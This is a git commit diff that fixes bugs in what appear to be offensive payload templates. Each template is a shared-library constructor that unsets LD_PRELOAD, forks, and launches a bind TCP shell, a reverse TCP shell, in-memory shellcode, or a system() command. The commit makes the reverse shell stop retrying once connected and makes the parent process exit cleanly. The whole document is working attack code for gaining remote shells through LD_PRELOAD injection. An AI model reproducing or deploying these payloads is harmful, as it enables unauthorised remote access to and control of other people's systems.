Resolve a bug in reverse_tcp and segfaults across payloads

2017-12-29 14:18:55 -06:00
parent 68f4d4480e
commit 0b9fbe5a63
64 changed files with 16 additions and 9 deletions
@@ -89,7 +89,8 @@ static void _run_payload_(void) __attribute__((constructor));
 static void _run_payload_(void)
 {
    unsetenv("LD_PRELOAD");
-    if (! fork()) {
+    if (! fork())
      _bind_tcp_shell();
-    }
+
+    exit(0);
 }
@@ -53,7 +53,9 @@ static void _reverse_tcp_shell(void) {
  memset(addr.sin_zero, 0, sizeof(addr.sin_zero));

  for (i=0; i<10; i++) {
-    connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr));
+    if (! connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr))) {
+      break;
+    }
  }

  for (i=0; i<3; i++) {
@@ -75,7 +77,8 @@ static void _run_payload_(void) __attribute__((constructor));
 static void _run_payload_(void)
 {
    unsetenv("LD_PRELOAD");
-    if (! fork()) {
+    if (! fork())
      _reverse_tcp_shell();
-    }
+
+    exit(0);
 }
@@ -37,8 +37,8 @@ static void _run_payload_(void)
  memcpy(mem, payload, PAYLOAD_SIZE);
  fn = (void(*)())mem;

-  if (! fork()) {
+  if (! fork())
    fn();
-    kill(getpid(), 9);
-  }
+
+  exit(0);
 }
@@ -23,7 +23,10 @@ static void _run_payload_(void) __attribute__((constructor));

 static void _run_payload_(void)
 {
+    int dummy = 0;
    unsetenv("LD_PRELOAD");
    if (! fork())
-      system((const char*)payload);
+      dummy = system((const char*)payload);
+
+    exit(dummy);
 }